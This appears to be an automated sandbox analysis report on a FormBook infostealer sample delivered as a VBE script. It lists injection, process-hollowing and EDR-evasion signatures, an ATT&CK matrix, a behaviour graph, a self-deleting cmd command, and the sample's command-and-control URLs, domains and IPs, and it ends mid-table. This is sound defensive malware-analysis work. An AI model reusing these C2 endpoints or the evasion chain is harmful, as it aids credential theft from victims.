          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01298BF0 mov eax, dword ptr fs:[00000030h]4_2_01298BF0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01298BF0 mov eax, dword ptr fs:[00000030h]4_2_01298BF0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012B0BCB mov eax, dword ptr fs:[00000030h]4_2_012B0BCB
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012B0BCB mov eax, dword ptr fs:[00000030h]4_2_012B0BCB
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012B0BCB mov eax, dword ptr fs:[00000030h]4_2_012B0BCB
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0133EBD0 mov eax, dword ptr fs:[00000030h]4_2_0133EBD0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01290BCD mov eax, dword ptr fs:[00000030h]4_2_01290BCD
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01290BCD mov eax, dword ptr fs:[00000030h]4_2_01290BCD
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01290BCD mov eax, dword ptr fs:[00000030h]4_2_01290BCD
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012BEA2E mov eax, dword ptr fs:[00000030h]4_2_012BEA2E
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CCA24 mov eax, dword ptr fs:[00000030h]4_2_012CCA24
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CCA38 mov eax, dword ptr fs:[00000030h]4_2_012CCA38
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012B4A35 mov eax, dword ptr fs:[00000030h]4_2_012B4A35
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012B4A35 mov eax, dword ptr fs:[00000030h]4_2_012B4A35
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0131CA11 mov eax, dword ptr fs:[00000030h]4_2_0131CA11
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0130CA72 mov eax, dword ptr fs:[00000030h]4_2_0130CA72
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0130CA72 mov eax, dword ptr fs:[00000030h]4_2_0130CA72
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CCA6F mov eax, dword ptr fs:[00000030h]4_2_012CCA6F
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CCA6F mov eax, dword ptr fs:[00000030h]4_2_012CCA6F
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CCA6F mov eax, dword ptr fs:[00000030h]4_2_012CCA6F
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0A5B mov eax, dword ptr fs:[00000030h]4_2_012A0A5B
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012A0A5B mov eax, dword ptr fs:[00000030h]4_2_012A0A5B
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01296A50 mov eax, dword ptr fs:[00000030h]4_2_01296A50
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01296A50 mov eax, dword ptr fs:[00000030h]4_2_01296A50
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01296A50 mov eax, dword ptr fs:[00000030h]4_2_01296A50
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01296A50 mov eax, dword ptr fs:[00000030h]4_2_01296A50
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01296A50 mov eax, dword ptr fs:[00000030h]4_2_01296A50
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01296A50 mov eax, dword ptr fs:[00000030h]4_2_01296A50
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01296A50 mov eax, dword ptr fs:[00000030h]4_2_01296A50
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01298AA0 mov eax, dword ptr fs:[00000030h]4_2_01298AA0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01298AA0 mov eax, dword ptr fs:[00000030h]4_2_01298AA0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012E6AA4 mov eax, dword ptr fs:[00000030h]4_2_012E6AA4
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129EA80 mov eax, dword ptr fs:[00000030h]4_2_0129EA80
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129EA80 mov eax, dword ptr fs:[00000030h]4_2_0129EA80
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129EA80 mov eax, dword ptr fs:[00000030h]4_2_0129EA80
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129EA80 mov eax, dword ptr fs:[00000030h]4_2_0129EA80
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129EA80 mov eax, dword ptr fs:[00000030h]4_2_0129EA80
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129EA80 mov eax, dword ptr fs:[00000030h]4_2_0129EA80
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129EA80 mov eax, dword ptr fs:[00000030h]4_2_0129EA80
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129EA80 mov eax, dword ptr fs:[00000030h]4_2_0129EA80
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0129EA80 mov eax, dword ptr fs:[00000030h]4_2_0129EA80
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01364A80 mov eax, dword ptr fs:[00000030h]4_2_01364A80
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C8A90 mov edx, dword ptr fs:[00000030h]4_2_012C8A90
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CAAEE mov eax, dword ptr fs:[00000030h]4_2_012CAAEE
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CAAEE mov eax, dword ptr fs:[00000030h]4_2_012CAAEE
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012E6ACC mov eax, dword ptr fs:[00000030h]4_2_012E6ACC
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012E6ACC mov eax, dword ptr fs:[00000030h]4_2_012E6ACC
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012E6ACC mov eax, dword ptr fs:[00000030h]4_2_012E6ACC
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01290AD0 mov eax, dword ptr fs:[00000030h]4_2_01290AD0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C4AD0 mov eax, dword ptr fs:[00000030h]4_2_012C4AD0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C4AD0 mov eax, dword ptr fs:[00000030h]4_2_012C4AD0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01318D20 mov eax, dword ptr fs:[00000030h]4_2_01318D20
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01348D10 mov eax, dword ptr fs:[00000030h]4_2_01348D10
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01348D10 mov eax, dword ptr fs:[00000030h]4_2_01348D10
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012AAD00 mov eax, dword ptr fs:[00000030h]4_2_012AAD00
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012AAD00 mov eax, dword ptr fs:[00000030h]4_2_012AAD00
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012AAD00 mov eax, dword ptr fs:[00000030h]4_2_012AAD00
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C4D1D mov eax, dword ptr fs:[00000030h]4_2_012C4D1D
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01286D10 mov eax, dword ptr fs:[00000030h]4_2_01286D10
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01286D10 mov eax, dword ptr fs:[00000030h]4_2_01286D10
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01286D10 mov eax, dword ptr fs:[00000030h]4_2_01286D10
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01328D6B mov eax, dword ptr fs:[00000030h]4_2_01328D6B
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01290D59 mov eax, dword ptr fs:[00000030h]4_2_01290D59
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01290D59 mov eax, dword ptr fs:[00000030h]4_2_01290D59
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01290D59 mov eax, dword ptr fs:[00000030h]4_2_01290D59
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01298D59 mov eax, dword ptr fs:[00000030h]4_2_01298D59
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01298D59 mov eax, dword ptr fs:[00000030h]4_2_01298D59
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01298D59 mov eax, dword ptr fs:[00000030h]4_2_01298D59
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01298D59 mov eax, dword ptr fs:[00000030h]4_2_01298D59
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01298D59 mov eax, dword ptr fs:[00000030h]4_2_01298D59
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012C6DA0 mov eax, dword ptr fs:[00000030h]4_2_012C6DA0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012B8DBF mov eax, dword ptr fs:[00000030h]4_2_012B8DBF
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012B8DBF mov eax, dword ptr fs:[00000030h]4_2_012B8DBF
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01358DAE mov eax, dword ptr fs:[00000030h]4_2_01358DAE
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01358DAE mov eax, dword ptr fs:[00000030h]4_2_01358DAE
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01364DAD mov eax, dword ptr fs:[00000030h]4_2_01364DAD
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CCDB1 mov ecx, dword ptr fs:[00000030h]4_2_012CCDB1
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CCDB1 mov eax, dword ptr fs:[00000030h]4_2_012CCDB1
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_012CCDB1 mov eax, dword ptr fs:[00000030h]4_2_012CCDB1
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128CDEA mov eax, dword ptr fs:[00000030h]4_2_0128CDEA
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0128CDEA mov eax, dword ptr fs:[00000030h]4_2_0128CDEA
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01330DF0 mov eax, dword ptr fs:[00000030h]4_2_01330DF0
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_01330DF0 mov eax, dword ptr fs:[00000030h]4_2_01330DF0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_009C51BD GetProcessHeap,HeapFree,6_2_009C51BD
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_009C7A38 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_009C7A38
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Benign windows process drops PE files
          Source: C:\Windows\System32\wscript.exeFile created: HHhHh.exe.0.drJump to dropped file
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 103.169.142.0 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.242 80Jump to behavior
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeNtQueueApcThread: Indirect: 0x123A4F2Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeNtClose: Indirect: 0x123A56C
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeMemory written: C:\Users\user\AppData\Local\Temp\HHhHh.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeSection loaded: NULL target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeSection loaded: NULL target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeThread register set: target process: 1028Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeThread register set: target process: 1028Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeSection unmapped: C:\Windows\SysWOW64\wscript.exe base address: 9B0000Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\HHhHh.exe "C:\Users\user\AppData\Local\Temp\HHhHh.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess created: C:\Users\user\AppData\Local\Temp\HHhHh.exe "C:\Users\user\AppData\Local\Temp\HHhHh.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\HHhHh.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeCode function: GetLocaleInfoW,wcsncmp,6_2_009C7084
          Source: C:\Windows\SysWOW64\wscript.exeCode function: GetUserDefaultLCID,GetLocaleInfoW,GetModuleFileNameW,FreeLibrary,GetLocaleInfoA,LoadStringA,GetModuleFileNameA,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,sprintf_s,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,GetUserDefaultLCID,GetLocaleInfoA,sprintf_s,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,6_2_009C544C
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeQueries volume information: C:\Users\user\AppData\Local\Temp\HHhHh.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_009C79A0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_009C79A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_009BB8C3 RegisterEventSourceW,GetUserNameW,LookupAccountNameW,LookupAccountNameW,ReportEventW,DeregisterEventSource,SysFreeString,RegCloseKey,RegCloseKey,6_2_009BB8C3
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_009B91C6 SysAllocString,GetVersionExA,IsTextUnicode,MultiByteToWideChar,GetLastError,SysAllocStringLen,MultiByteToWideChar,GetLastError,_swab,memmove,SysFreeString,6_2_009B91C6
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.2.HHhHh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.HHhHh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.2.HHhHh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.HHhHh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_009B9D9A CreateBindCtx,SysFreeString,SysAllocStringByteLen,6_2_009B9D9A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_009C1170 CreateBindCtx,CreateFileMoniker,MkParseDisplayName,6_2_009C1170
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_009BDEED CoCreateInstance,CoCreateInstance,GetUserDefaultLCID,CoGetClassObject,CreateBindCtx,6_2_009BDEED

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information1
          Scripting          		Valid Accounts1
          Shared Modules          		1
          Scripting          		1
          Abuse Elevation Control Mechanism          		1
          Disable or Modify Tools          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		4
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Exploitation for Client Execution          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          Account Discovery          		Remote Desktop ProtocolData from Removable Media1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)611
          Process Injection          		1
          Abuse Elevation Control Mechanism          		Security Account Manager2
          File and Directory Discovery          		SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
          Obfuscated Files or Information          		NTDS224
          System Information Discovery          		Distributed Component Object ModelInput Capture13
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
          Software Packing          		LSA Secrets231
          Security Software Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials1
          Process Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Masquerading          		DCSync41
          Virtualization/Sandbox Evasion          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
          Virtualization/Sandbox Evasion          		Proc Filesystem1
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt611
          Process Injection          		/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1482976 Sample: TNS71092E68UI0.vbe Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 35 www.tateshades.xyz 2->35 37 www.legalix.xyz 2->37 39 14 other IPs or domains 2->39 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 Multi AV Scanner detection for submitted file 2->59 63 5 other signatures 2->63 12 wscript.exe 2 2->12         started        signatures3 61 Performs DNS queries to domains with low reputation 37->61 process4 file5 33 C:\Users\user\AppData\Local\Temp\HHhHh.exe, PE32 12->33 dropped 83 Benign windows process drops PE files 12->83 85 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->85 16 HHhHh.exe 3 12->16         started        signatures6 process7 signatures8 47 Antivirus detection for dropped file 16->47 49 Machine Learning detection for dropped file 16->49 51 Tries to detect virtualization through RDTSC time measurements 16->51 53 2 other signatures 16->53 19 HHhHh.exe 16->19         started        process9 signatures10 65 Modifies the context of a thread in another process (thread injection) 19->65 67 Maps a DLL or memory area into another process 19->67 69 Sample uses process hollowing technique 19->69 71 2 other signatures 19->71 22 explorer.exe 85 1 19->22 injected process11 dnsIp12 41 www.tateshades.xyz 198.54.117.242, 49716, 80 NAMECHEAP-NETUS United States 22->41 43 especialistaleitura.online 195.35.41.249, 49721, 80 MTSRU Germany 22->43 45 3 other IPs or domains 22->45 73 System process connects to network (likely due to code injection or exploit) 22->73 26 wscript.exe 22->26         started        signatures13 process14 signatures15 75 Modifies the context of a thread in another process (thread injection) 26->75 77 Maps a DLL or memory area into another process 26->77 79 Tries to detect virtualization through RDTSC time measurements 26->79 81 Switches to a custom stack to bypass stack traces 26->81 29 cmd.exe 1 26->29         started        process16 process17 31 conhost.exe 29->31         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          TNS71092E68UI0.vbe17%VirustotalBrowse

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\HHhHh.exe100%AviraHEUR/AGEN.1357443
          C:\Users\user\AppData\Local\Temp\HHhHh.exe100%Joe Sandbox ML

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.gyosei-arimura.com/de94/?jBZ=DixB1qykAeF3P3PXJeHdSknPWO1HgPnInxoSQIfAm9wP6zKJEe36YOPFRPwN1ZbEVsUi&iH=L48pdJnx0%Avira URL Cloudsafe
          www.happygreenfarm.com/de94/0%Avira URL Cloudsafe
          http://www.ashleymorgan.live/de94/?iH=L48pdJnx&jBZ=5tT0wx6F9dDlvd0I7/Gf0Z876YhP5UCSCTQNI7gCLgEp6gs1sNLPrbs4iKZbSyW3sHh40%Avira URL Cloudsafe
          http://www.rendamaisbr.com/de94/?jBZ=oGEpRlg+OmPq0B7KIcYot+ASNw6YPmukejZMyF938WrRMvUmELkE1jbD5t8azbvrsm6P&iH=L48pdJnx0%Avira URL Cloudsafe
          http://www.tateshades.xyz/de94/?iH=L48pdJnx&jBZ=KxdOA0Mo1WZhrruLdWg4BGjiUazPRKkva+c6BVUkR9pg9lvbFJGOvuIlGrqlewJrvTBn0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          especialistaleitura.online
          		195.35.41.249
          		truetrue
            		unknown
            host.websitepro.hosting
            		34.149.86.124
            		truefalse
              		unknown
              www.rendamaisbr.com
              		104.21.29.136
              		truefalse
                		unknown
                www.tateshades.xyz
                		198.54.117.242
                		truetrue
                  		unknown
                  www.gyosei-arimura.com
                  		103.169.142.0
                  		truetrue
                    		unknown
                    ashleymorgan.live
                    		79.133.41.250
                    		truetrue
                      		unknown
                      rtproketslotcsn.art
                      		67.223.118.63
                      		truetrue
                        		unknown
                        ext-sq.squarespace.com
                        		198.185.159.144
                        		truefalse
                          		unknown
                          www.21stcut.shop
                          		103.224.182.210
                          		truefalse
                            		unknown
                            www.ashleymorgan.live
                            		unknown
                            		unknowntrue
                              		unknown
                              www.especialistaleitura.online
                              		unknown
                              		unknowntrue
                                		unknown
                                www.legalix.xyz
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.rtproketslotcsn.art
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.gv031.net
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.exploringtheoutdoors.net
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.invigoratewell.com
                                        		unknown
                                        		unknowntrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.gyosei-arimura.com/de94/?jBZ=DixB1qykAeF3P3PXJeHdSknPWO1HgPnInxoSQIfAm9wP6zKJEe36YOPFRPwN1ZbEVsUi&iH=L48pdJnxtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.ashleymorgan.live/de94/?iH=L48pdJnx&jBZ=5tT0wx6F9dDlvd0I7/Gf0Z876YhP5UCSCTQNI7gCLgEp6gs1sNLPrbs4iKZbSyW3sHh4false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.rendamaisbr.com/de94/?jBZ=oGEpRlg+OmPq0B7KIcYot+ASNw6YPmukejZMyF938WrRMvUmELkE1jbD5t8azbvrsm6P&iH=L48pdJnxfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.tateshades.xyz/de94/?iH=L48pdJnx&jBZ=KxdOA0Mo1WZhrruLdWg4BGjiUazPRKkva+c6BVUkR9pg9lvbFJGOvuIlGrqlewJrvTBntrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          www.happygreenfarm.com/de94/true
                                          • Avira URL Cloud: safe
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          195.35.41.249
                                          		especialistaleitura.onlineGermany
                                          		8359MTSRUtrue
                                          103.169.142.0
                                          		www.gyosei-arimura.comunknown
                                          		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                          198.54.117.242
